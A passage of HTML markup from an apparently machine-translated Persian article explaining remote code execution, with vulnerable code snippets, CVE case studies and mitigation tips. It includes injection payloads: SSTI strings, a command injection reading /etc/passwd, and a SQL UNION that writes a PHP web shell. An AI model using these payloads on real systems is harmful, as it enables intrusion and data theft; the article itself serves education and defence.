src=\"https:\/\/media2.dev.to\/dynamic\/image\/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto\/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftnlkymfi01v5lpouobbh.png\" alt=\"\u062a\u0632\u0631\u06cc\u0642 \u0627\u0644\u06af\u0648\u06cc \u0633\u0645\u062a \u0633\u0631\u0648\u0631\" loading=\"lazy\" width=\"800\" height=\"533\" title=\"\"><\/p>\n<p>\u0645\u062d\u0628\u0648\u0628 \u062f\u0631 Jinja2 Python \u06cc\u0627 Ruby&#39;s ERB \u060c SSTI \u0647\u0646\u06af\u0627\u0645\u06cc \u0627\u062a\u0641\u0627\u0642 \u0645\u06cc \u0627\u0641\u062a\u062f \u06a9\u0647 \u0648\u0631\u0648\u062f\u06cc \u06a9\u0627\u0631\u0628\u0631 \u062f\u0631 \u0642\u0627\u0644\u0628 \u0647\u0627\u06cc \u0628\u062f\u0648\u0646 \u0636\u062f \u0639\u0641\u0648\u0646\u06cc \u062a\u0639\u0628\u06cc\u0647 \u0634\u0648\u062f:<\/p>\n<div class=\"highlight js-code-highlight\">\n<pre class=\"highlight python\"><code><span class=\"n\">template<\/span> <span class=\"o\">=<\/span> <span class=\"nc\">Template<\/span><span class=\"p\">(<\/span><span class=\"n\">user_input<\/span><span class=\"p\">)<\/span>\n<\/code><\/pre>\n<div class=\"highlight__panel js-actions-panel\">\n<div class=\"highlight__panel-action js-fullscreen-code-action\">\n    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-on\"><title>\u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0631\u0627 \u0648\u0627\u0631\u062f \u06a9\u0646\u06cc\u062f<\/title>\n    <path d=\"M16 3h6v6h-2V5h-4V3zM2 3h6v2H4v4H2V3zm18 16v-4h2v6h-6v-2h4zM4 19h4v2H2v-6h2v4z\"\/>\n<\/svg><\/p>\n<p>    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-off\"><title>\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 
\u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/title>\n    <path d=\"M18 7h4v2h-6V3h2v4zM8 9H2V7h4V3h2v6zm10 8v4h-2v-6h6v2h-4zM8 15v6H6v-4H2v-2h6z\"\/>\n<\/svg><\/p>\n<\/div>\n<\/div>\n<\/div>\n<p>\u06cc\u06a9 \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc \u062a\u0648\u0627\u0646\u062f \u062a\u0632\u0631\u06cc\u0642 \u06a9\u0646\u062f <code>{{config.items()}}<\/code> \u06cc\u0627 \u0628\u062f\u062a\u0631 \u060c <code>{{().__class__.__bases__[0].__subclasses__()}}<\/code>\u0628\u0634\u0631<\/p>\n<hr\/>\n<h2><span class=\"ez-toc-section\" id=\"%DA%86%DA%AF%D9%88%D9%86%D9%87_%D9%87%DA%A9%D8%B1%D9%87%D8%A7_%D8%A7%D8%B2_RCE_%D8%A7%D8%B3%D8%AA%D9%81%D8%A7%D8%AF%D9%87_%D9%85%DB%8C_%DA%A9%D9%86%D9%86%D8%AF_%DA%AF%D8%A7%D9%85_%D8%A8%D9%87_%DA%AF%D8%A7%D9%85\"><\/span>\n<p>  <strong>\u0686\u06af\u0648\u0646\u0647 \u0647\u06a9\u0631\u0647\u0627 \u0627\u0632 RCE \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc \u06a9\u0646\u0646\u062f (\u06af\u0627\u0645 \u0628\u0647 \u06af\u0627\u0645)<\/strong><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><img decoding=\"async\" src=\"https:\/\/media2.dev.to\/dynamic\/image\/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto\/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4ibjxaimf1cer7y57bgm.png\" alt=\"\u0686\u06af\u0648\u0646\u0647 \u0647\u06a9\u0631\u0647\u0627 \u0627\u0632 RCE \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc \u06a9\u0646\u0646\u062f\" loading=\"lazy\" width=\"800\" height=\"533\" title=\"\"><\/p>\n<h3><span class=\"ez-toc-section\" id=\"1_%D8%B4%D9%86%D8%A7%D8%B3%D8%A7%DB%8C%DB%8C\"><\/span>\n<p>  <strong>1. \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc<\/strong><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<h3><span class=\"ez-toc-section\" id=\"2_%D8%AA%DA%A9%D9%86%DB%8C%DA%A9_%D9%87%D8%A7%DB%8C_%D8%A8%D9%87%D8%B1%D9%87_%D8%A8%D8%B1%D8%AF%D8%A7%D8%B1%DB%8C\"><\/span>\n<p>  <strong>2. 
\u062a\u06a9\u0646\u06cc\u06a9 \u0647\u0627\u06cc \u0628\u0647\u0631\u0647 \u0628\u0631\u062f\u0627\u0631\u06cc<\/strong><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<ul>\n<li>\n<p><strong>\u062a\u0632\u0631\u06cc\u0642 \u0641\u0631\u0645\u0627\u0646 (PHP)<\/strong>:<\/p>\n<pre class=\"highlight php\"><code><span class=\"cp\"><?php <\/span?> <span class=\"nv\">$cmd<\/span> <span class=\"o\">=<\/span> <span class=\"nv\">$_GET<\/span><span class=\"p\">[<\/span><span class=\"s1\">'cmd'<\/span><span class=\"p\">];<\/span> <span class=\"nb\">system<\/span><span class=\"p\">(<\/span><span class=\"nv\">$cmd<\/span><span class=\"p\">);<\/span> <span class=\"cp\">?&gt;<\/span>\n\/\/ Exploited with: ?cmd=whoami\n<\/span><\/code><\/pre>\n<\/li>\n<li>\n<p><strong>\u062a\u0632\u0631\u06cc\u0642 \u0641\u0631\u0645\u0627\u0646 (node.js)<\/strong>:<\/p>\n<pre class=\"highlight javascript\"><code><span class=\"kd\">const<\/span> <span class=\"p\">{<\/span> <span class=\"nx\">exec<\/span> <span class=\"p\">}<\/span> <span class=\"o\">=<\/span> <span class=\"nf\">require<\/span><span class=\"p\">(<\/span><span class=\"dl\">'<\/span><span class=\"s1\">child_process<\/span><span class=\"dl\">'<\/span><span class=\"p\">);<\/span>\n<span class=\"nf\">exec<\/span><span class=\"p\">(<\/span><span class=\"s2\">`ls -l <\/span><span class=\"p\">${<\/span><span class=\"nx\">userInput<\/span><span class=\"p\">}<\/span><span class=\"s2\">`<\/span><span class=\"p\">,<\/span> <span class=\"p\">...);<\/span>\n<span class=\"c1\">\/\/ ?input=; cat \/etc\/passwd<\/span>\n<\/code><\/pre>\n<\/li>\n<li>\n<p><strong>\u062a\u0632\u0631\u06cc\u0642 SQL \u0645\u0646\u062a\u0647\u06cc \u0628\u0647 RCE<\/strong>:<\/p>\n<pre class=\"highlight php\"><code><span class=\"cp\"><?php <\/span?>\n<span class=\"nv\">$query<\/span> <span class=\"o\">=<\/span> <span class=\"s2\">\"SELECT * FROM users WHERE username=\"\"<\/span><span class=\"mf\">.<\/span> <span class=\"nv\">$_GET<\/span><span 
class=\"p\">[<\/span><span class=\"s1\">\"username'<\/span><span class=\"p\">]<\/span><span class=\"mf\">.<\/span> <span class=\"s2\">\"'\"<\/span><span class=\"p\">;<\/span>\n<span class=\"c1\">\/\/ Payload: ' UNION SELECT \"<?php system($_GET['cmd']);??>\" INTO OUTFILE ...<\/span>\n<span class=\"cp\">?&gt;<\/span>\n<\/span><\/code><\/pre>\n<\/li>\n<li>\n<p><strong>\u0646\u0627\u0627\u0645\u0646 \u0634\u062f\u0646 \u0646\u0627\u0627\u0645\u0646 (\u067e\u0627\u06cc\u062a\u0648\u0646 + \u062a\u0631\u0634\u06cc)<\/strong>:<\/p>\n<pre class=\"highlight python\"><code><span class=\"kn\">import<\/span> <span class=\"n\">pickle<\/span>\n<span class=\"n\">user<\/span> <span class=\"o\">=<\/span> <span class=\"n\">pickle<\/span><span class=\"p\">.<\/span><span class=\"nf\">loads<\/span><span class=\"p\">(<\/span><span class=\"n\">base64<\/span><span class=\"p\">.<\/span><span class=\"nf\">b64decode<\/span><span class=\"p\">(<\/span><span class=\"n\">request<\/span><span class=\"p\">.<\/span><span class=\"n\">form<\/span><span class=\"p\">[<\/span><span class=\"sh\">'<\/span><span class=\"s\">payload<\/span><span class=\"sh\">'<\/span><span class=\"p\">]))<\/span>\n<\/code><\/pre>\n<\/li>\n<li>\n<p><strong>\u0628\u0627\u0631\u06af\u0630\u0627\u0631\u06cc \u067e\u0631\u0648\u0646\u062f\u0647<\/strong>:<\/p>\n<pre class=\"highlight php\"><code><span class=\"cp\"><?php <\/span?> <span class=\"nb\">move_uploaded_file<\/span><span class=\"p\">(<\/span><span class=\"nv\">$_FILES<\/span><span class=\"p\">[<\/span><span class=\"s1\">'file'<\/span><span class=\"p\">][<\/span><span class=\"s1\">'tmp_name'<\/span><span class=\"p\">],<\/span> <span class=\"s2\">\"uploads\/\"<\/span><span class=\"mf\">.<\/span> <span class=\"nv\">$_FILES<\/span><span class=\"p\">[<\/span><span class=\"s1\">'file'<\/span><span class=\"p\">][<\/span><span class=\"s1\">'name'<\/span><span class=\"p\">]);<\/span> <span class=\"cp\">?&gt;<\/span>\n\/\/ Upload: shell.php with 
system($_GET['cmd'])\n<\/span><\/code><\/pre>\n<\/li>\n<\/ul>\n<h3><span class=\"ez-toc-section\" id=\"3_%D8%AA%D8%AD%D9%88%DB%8C%D9%84_%D8%A8%D8%A7%D8%B1\"><\/span>\n<p>  <strong>3. \u062a\u062d\u0648\u06cc\u0644 \u0628\u0627\u0631<\/strong><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<h3><span class=\"ez-toc-section\" id=\"4_%D9%BE%D8%B3_%D8%A7%D8%B2_%D8%A8%D9%87%D8%B1%D9%87_%D8%A8%D8%B1%D8%AF%D8%A7%D8%B1%DB%8C\"><\/span>\n<p>  <strong>4. \u067e\u0633 \u0627\u0632 \u0628\u0647\u0631\u0647 \u0628\u0631\u062f\u0627\u0631\u06cc<\/strong><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<ul>\n<li>\n<p>\u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0631\u0627 \u0627\u0636\u0627\u0641\u0647 \u06a9\u0646\u06cc\u062f \u060c \u0627\u0628\u0632\u0627\u0631\u0647\u0627\u06cc \u067e\u0627\u06cc\u062f\u0627\u0631\u06cc \u060c \u062d\u0631\u06a9\u062a \u062c\u0627\u0646\u0628\u06cc \u0631\u0627 \u0646\u0635\u0628 \u06a9\u0646\u06cc\u062f<\/p>\n<\/li>\n<li>\n<p>\u0646\u062a\u0627\u06cc\u062c \u0627\u062d\u062a\u0645\u0627\u0644\u06cc: \u0631\u0645\u0632\u0646\u06af\u0627\u0631\u06cc \u060c \u0628\u0627\u062c \u0627\u0641\u0632\u0627\u0631 \u060c \u0633\u0631\u0642\u062a \u062f\u0627\u062f\u0647 \u0647\u0627<\/p>\n<\/li>\n<\/ul>\n<hr\/>\n<h3><span class=\"ez-toc-section\" id=\"%D8%AA%D8%A3%D8%AB%DB%8C%D8%B1_%D8%AD%D9%85%D9%84%D8%A7%D8%AA_%D9%85%D9%88%D9%81%D9%82%DB%8C%D8%AA_%D8%A2%D9%85%DB%8C%D8%B2_RCE\"><\/span>\n<p>  <strong>\u062a\u0623\u062b\u06cc\u0631 \u062d\u0645\u0644\u0627\u062a \u0645\u0648\u0641\u0642\u06cc\u062a \u0622\u0645\u06cc\u0632 RCE<\/strong><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<ul>\n<li>\n<p><strong>\u0646\u0642\u0636 \u062f\u0627\u062f\u0647 \u0647\u0627<\/strong>: PII \u060c \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u067e\u0627\u06cc\u06af\u0627\u0647 \u062f\u0627\u062f\u0647 \u060c \u0646\u0634\u062a 
\u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc<\/p>\n<\/li>\n<li>\n<p><strong>\u06a9\u0646\u062a\u0631\u0644 \u06a9\u0627\u0645\u0644 \u0633\u0631\u0648\u0631<\/strong>: \u0628\u062f\u0627\u0641\u0632\u0627\u0631 \u060c \u067e\u0634\u062a\u0648\u0627\u0646\u0647 \u060c \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u062c\u062f\u06cc\u062f \u0631\u0627 \u0646\u0635\u0628 \u06a9\u0646\u06cc\u062f<\/p>\n<\/li>\n<li>\n<p><strong>\u0627\u0633\u062a\u0642\u0631\u0627\u0631 \u0628\u0627\u062c \u0627\u0641\u0632\u0627\u0631<\/strong>: \u067e\u0631\u0648\u0646\u062f\u0647 \u0647\u0627\u06cc \u0631\u0645\u0632\u06af\u0630\u0627\u0631\u06cc \u0634\u062f\u0647 \u060c \u062a\u0642\u0627\u0636\u0627\u06cc \u067e\u0631\u062f\u0627\u062e\u062a<\/p>\n<\/li>\n<li>\n<p><strong>\u0631\u0645\u0632<\/strong>: \u0645\u0639\u062f\u0646 \u0631\u0645\u0632\u0646\u06af\u0627\u0631\u06cc \u067e\u0646\u0647\u0627\u0646 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0645\u0646\u0627\u0628\u0639 \u0633\u0631\u0648\u0631<\/p>\n<\/li>\n<li>\n<p><strong>\u0627\u0646\u06a9\u0627\u0631 \u062e\u062f\u0645\u0627\u062a<\/strong>: \u0633\u0631\u0648\u0631 \u0631\u0627 \u0628\u0631\u0627\u06cc \u062d\u0645\u0644\u0627\u062a \u06af\u0633\u062a\u0631\u062f\u0647 \u062a\u0631 \u0627\u0633\u0644\u062d\u0647 \u06a9\u0646\u06cc\u062f<\/p>\n<\/li>\n<li>\n<p><strong>\u062e\u0633\u0627\u0631\u062a \u0628\u0647 \u0627\u0639\u062a\u0628\u0627\u0631<\/strong>: \u0627\u0639\u062a\u0645\u0627\u062f \u0627\u0632 \u062f\u0633\u062a \u0631\u0641\u062a\u0647 \u060c \u062c\u0631\u06cc\u0645\u0647 \u0647\u0627\u06cc \u0642\u0627\u0646\u0648\u0646\u06cc \u060c \u062e\u0631\u0627\u0628\u06cc \u06af\u0633\u062a\u0631\u062f\u0647<\/p>\n<\/li>\n<\/ul>\n<hr\/>\n<h3><span class=\"ez-toc-section\" id=\"%D9%85%D8%B7%D8%A7%D9%84%D8%B9%D8%A7%D8%AA_%D9%85%D9%88%D8%B1%D8%AF%DB%8C_RCE_%D8%A8%D8%A7_%D9%85%D8%B4%D8%AE%D8%B5%D8%A7%D8%AA_%D8%A8%D8%A7%D9%84%D8%A7\"><\/span>\n<p>  
<strong>\u0645\u0637\u0627\u0644\u0639\u0627\u062a \u0645\u0648\u0631\u062f\u06cc RCE \u0628\u0627 \u0645\u0634\u062e\u0635\u0627\u062a \u0628\u0627\u0644\u0627<\/strong><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><img decoding=\"async\" src=\"https:\/\/media2.dev.to\/dynamic\/image\/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto\/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmyl6ck8miryuewpjzuxj.png\" alt=\"\u0645\u0637\u0627\u0644\u0639\u0627\u062a \u0645\u0648\u0631\u062f\u06cc RCE \u0628\u0627 \u0645\u0634\u062e\u0635\u0627\u062a \u0628\u0627\u0644\u0627\" loading=\"lazy\" width=\"800\" height=\"533\" title=\"\"><\/p>\n<h4><span class=\"ez-toc-section\" id=\"1_Ivanti_Connect_Secure_%D9%88_Policy_Secure_CVE-2024-21887_CVE-2023-46805\"><\/span>\n<p>  <strong>1. Ivanti Connect Secure \u0648 Policy Secure (CVE-2024-21887 &#038; CVE-2023-46805)<\/strong><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<ul>\n<li>\n<p>\u0645\u0648\u0631\u062f \u0633\u0648\u0621 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u062f\u0631 \u0698\u0627\u0646\u0648\u06cc\u0647 2024<\/p>\n<\/li>\n<li>\n<p>2\u060c000 \u062f\u0633\u062a\u06af\u0627\u0647 VPN \u062a\u062d\u062a \u062a\u0623\u062b\u06cc\u0631 \u0642\u0631\u0627\u0631 \u06af\u0631\u0641\u062a<\/p>\n<\/li>\n<li>\n<p>\u0628\u0647\u0631\u0647 \u0628\u0631\u062f\u0627\u0631\u06cc \u062d\u062a\u06cc \u067e\u0633 \u0627\u0632 \u062a\u0646\u0638\u06cc\u0645 \u0645\u062c\u062f\u062f \u06a9\u0627\u0631\u062e\u0627\u0646\u0647 \u0647\u0645\u0686\u0646\u0627\u0646 \u0627\u062f\u0627\u0645\u0647 \u062f\u0627\u0634\u062a<\/p>\n<\/li>\n<\/ul>\n<h4><span class=\"ez-toc-section\" id=\"2_Apache_Struts_2_CVE-2024-53677\"><\/span>\n<p>  <strong>2. 
Apache Struts 2 (CVE-2024-53677)<\/strong><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<ul>\n<li>\n<p>\u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u067e\u06cc\u0645\u0627\u06cc\u0634 \u0645\u0633\u06cc\u0631 \u062f\u0631 \u0645\u0646\u0637\u0642 \u0628\u0627\u0631\u06af\u0630\u0627\u0631\u06cc \u067e\u0631\u0648\u0646\u062f\u0647<\/p>\n<\/li>\n<li>\n<p>\u0633\u06cc\u0633\u062a\u0645 \u0647\u0627\u06cc \u0642\u062f\u06cc\u0645\u06cc (legacy) \u062a\u062d\u062a \u062a\u0623\u062b\u06cc\u0631 \u0647\u0646\u0648\u0632 \u062f\u0631 \u062d\u0627\u0644 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0633\u062a<\/p>\n<\/li>\n<li>\n<p>\u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 POC \u0639\u0645\u0648\u0645\u06cc \u062f\u0631 \u062f\u0646\u06cc\u0627\u06cc \u0648\u0627\u0642\u0639\u06cc \u0645\u0648\u0631\u062f \u0633\u0648\u0621 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0642\u0631\u0627\u0631 \u0645\u06cc \u06af\u06cc\u0631\u062f<\/p>\n<\/li>\n<\/ul>\n<h4><span class=\"ez-toc-section\" id=\"3_PHP_%D8%AF%D8%B1_%D9%88%DB%8C%D9%86%D8%AF%D9%88%D8%B2_CVE-2024-4577\"><\/span>\n<p>  <strong>3. 
PHP \u062f\u0631 \u0648\u06cc\u0646\u062f\u0648\u0632 (CVE-2024-4577)<\/strong><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<ul>\n<li>\n<p>\u0627\u0632 \u0637\u0631\u06cc\u0642 \u062a\u0632\u0631\u06cc\u0642 \u0622\u0631\u06af\u0648\u0645\u0627\u0646 CGI \u0641\u0639\u0627\u0644 \u0645\u06cc \u0634\u0648\u062f<\/p>\n<\/li>\n<li>\n<p>\u062a\u0646\u0638\u06cc\u0645\u0627\u062a XAMPP \u062e\u0627\u0635 \u0632\u0628\u0627\u0646 \u062a\u062d\u062a \u062a\u0623\u062b\u06cc\u0631<\/p>\n<\/li>\n<li>\n<p>\u0646\u0634\u0627\u0646 \u062f\u0627\u062f\u0647 \u0634\u062f\u0647 \u0627\u0633\u062a \u06a9\u0647 \u0686\u06af\u0648\u0646\u0647 \u0648\u06cc\u0698\u06af\u06cc \u0647\u0627\u06cc \u06a9\u062f\u06af\u0630\u0627\u0631\u06cc \u0646\u0648\u06cc\u0633\u0647 \u0645\u06cc \u062a\u0648\u0627\u0646\u0646\u062f \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627 \u0631\u0627 \u0645\u0639\u0631\u0641\u06cc \u06a9\u0646\u0646\u062f<\/p>\n<\/li>\n<\/ul>\n<h4><span class=\"ez-toc-section\" id=\"4_Apache_Tomcat_CVE-2025-24813\"><\/span>\n<p>  <strong>4. Apache Tomcat (CVE-2025-24813)<\/strong><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<h4><span class=\"ez-toc-section\" id=\"5_%D8%B3%D8%A7%DB%8C%D8%B1_%D8%B3%DB%8C%D8%B3%D8%AA%D9%85_%D8%B9%D8%A7%D9%85%D9%84_%D9%87%D8%A7%DB%8C_%D8%A2%D8%B3%DB%8C%D8%A8_%D9%BE%D8%B0%DB%8C%D8%B1\"><\/span>\n<p>  <strong>5. 
\u0633\u0627\u06cc\u0631 \u067e\u0644\u062a\u0641\u0631\u0645 \u0647\u0627\u06cc \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631<\/strong><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<ul>\n<li>\n<p>Atlassian Confluence \u060c Microsoft SharePoint \u060c Xwiki \u060c Azure Web Apps \u060c Veeam \u0648 Zyxel<\/p>\n<\/li>\n<li>\n<p>\u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0647\u0627 \u0627\u0632 deserialization \u0648 \u067e\u06cc\u0645\u0627\u06cc\u0634 \u0645\u0633\u06cc\u0631 \u062a\u0627 \u062f\u0648\u0631 \u0632\u062f\u0646 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0645\u062a\u063a\u06cc\u0631 \u0627\u0633\u062a<\/p>\n<\/li>\n<\/ul>\n<hr\/>\n<h2><span class=\"ez-toc-section\" id=\"%D8%A7%D8%B3%D8%AA%D8%B1%D8%A7%D8%AA%DA%98%DB%8C_%D9%87%D8%A7%DB%8C_%DA%A9%D8%A7%D9%87%D8%B4\"><\/span>\n<p>  <strong>\u0627\u0633\u062a\u0631\u0627\u062a\u0698\u06cc \u0647\u0627\u06cc \u06a9\u0627\u0647\u0634<\/strong><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><img decoding=\"async\" src=\"https:\/\/media2.dev.to\/dynamic\/image\/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto\/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcramu67wokc4jxjkg04k.png\" alt=\"\u0627\u0633\u062a\u0631\u0627\u062a\u0698\u06cc \u0647\u0627\u06cc \u06a9\u0627\u0647\u0634\" loading=\"lazy\" width=\"800\" height=\"533\" title=\"\"><\/p>\n<ol>\n<li><strong>\u0628\u0631\u0646\u0627\u0645\u0647 \u0646\u0648\u06cc\u0633\u06cc \u0627\u06cc\u0645\u0646<\/strong><\/li>\n<\/ol>\n<div class=\"highlight js-code-highlight\">\n<pre class=\"highlight plaintext\"><code>- Sanitize input\n\n- Use parameterized queries\n\n- Avoid `eval()`, `system()` in code\n<\/code><\/pre>\n<div class=\"highlight__panel js-actions-panel\">\n<div class=\"highlight__panel-action js-fullscreen-code-action\">\n    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 
24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-on\"><title>\u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0631\u0627 \u0648\u0627\u0631\u062f \u06a9\u0646\u06cc\u062f<\/title>\n    <path d=\"M16 3h6v6h-2V5h-4V3zM2 3h6v2H4v4H2V3zm18 16v-4h2v6h-6v-2h4zM4 19h4v2H2v-6h2v4z\"\/>\n<\/svg><\/p>\n<p>    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-off\"><title>\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/title>\n    <path d=\"M18 7h4v2h-6V3h2v4zM8 9H2V7h4V3h2v6zm10 8v4h-2v-6h6v2h-4zM8 15v6H6v-4H2v-2h6z\"\/>\n<\/svg><\/p>\n<\/div>\n<\/div>\n<\/div>\n<ol>\n<li><strong>\u067e\u0686 \u0648 \u0628\u0647 \u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc \u0647\u0627<\/strong><\/li>\n<\/ol>\n<div class=\"highlight js-code-highlight\">\n<pre class=\"highlight plaintext\"><code>- Automate patch cycles\n\n- Apply security advisories ASAP\n<\/code><\/pre>\n<div class=\"highlight__panel js-actions-panel\">\n<div class=\"highlight__panel-action js-fullscreen-code-action\">\n    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-on\"><title>\u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0631\u0627 \u0648\u0627\u0631\u062f \u06a9\u0646\u06cc\u062f<\/title>\n    <path d=\"M16 3h6v6h-2V5h-4V3zM2 3h6v2H4v4H2V3zm18 16v-4h2v6h-6v-2h4zM4 19h4v2H2v-6h2v4z\"\/>\n<\/svg><\/p>\n<p>    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-off\"><title>\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c 
\u0634\u0648\u06cc\u062f<\/title>\n    <path d=\"M18 7h4v2h-6V3h2v4zM8 9H2V7h4V3h2v6zm10 8v4h-2v-6h6v2h-4zM8 15v6H6v-4H2v-2h6z\"\/>\n<\/svg><\/p>\n<\/div>\n<\/div>\n<\/div>\n<ol>\n<li><strong>\u0641\u0627\u06cc\u0631\u0648\u0627\u0644 \u0628\u0631\u0646\u0627\u0645\u0647 \u0648\u0628 (WAF)<\/strong><\/li>\n<\/ol>\n<div class=\"highlight js-code-highlight\">\n<pre class=\"highlight plaintext\"><code>- Detect common payloads, block them\n<\/code><\/pre>\n<div class=\"highlight__panel js-actions-panel\">\n<div class=\"highlight__panel-action js-fullscreen-code-action\">\n    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-on\"><title>\u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0631\u0627 \u0648\u0627\u0631\u062f \u06a9\u0646\u06cc\u062f<\/title>\n    <path d=\"M16 3h6v6h-2V5h-4V3zM2 3h6v2H4v4H2V3zm18 16v-4h2v6h-6v-2h4zM4 19h4v2H2v-6h2v4z\"\/>\n<\/svg><\/p>\n<p>    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-off\"><title>\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/title>\n    <path d=\"M18 7h4v2h-6V3h2v4zM8 9H2V7h4V3h2v6zm10 8v4h-2v-6h6v2h-4zM8 15v6H6v-4H2v-2h6z\"\/>\n<\/svg><\/p>\n<\/div>\n<\/div>\n<\/div>\n<ol>\n<li><strong>\u062d\u062f\u0627\u0642\u0644 \u0627\u0635\u0644 \u0627\u0645\u062a\u06cc\u0627\u0632<\/strong><\/li>\n<\/ol>\n<div class=\"highlight js-code-highlight\">\n<pre class=\"highlight plaintext\"><code>- Run processes as non-root users\n<\/code><\/pre>\n<div class=\"highlight__panel js-actions-panel\">\n<div class=\"highlight__panel-action js-fullscreen-code-action\">\n    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" 
class=\"highlight-action crayons-icon highlight-action--fullscreen-on\"><title>\u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0631\u0627 \u0648\u0627\u0631\u062f \u06a9\u0646\u06cc\u062f<\/title>\n    <path d=\"M16 3h6v6h-2V5h-4V3zM2 3h6v2H4v4H2V3zm18 16v-4h2v6h-6v-2h4zM4 19h4v2H2v-6h2v4z\"\/>\n<\/svg><\/p>\n<p>    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-off\"><title>\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/title>\n    <path d=\"M18 7h4v2h-6V3h2v4zM8 9H2V7h4V3h2v6zm10 8v4h-2v-6h6v2h-4zM8 15v6H6v-4H2v-2h6z\"\/>\n<\/svg><\/p>\n<\/div>\n<\/div>\n<\/div>\n<ol>\n<li><strong>Deserialization \u0627\u06cc\u0645\u0646<\/strong><\/li>\n<\/ol>\n<div class=\"highlight 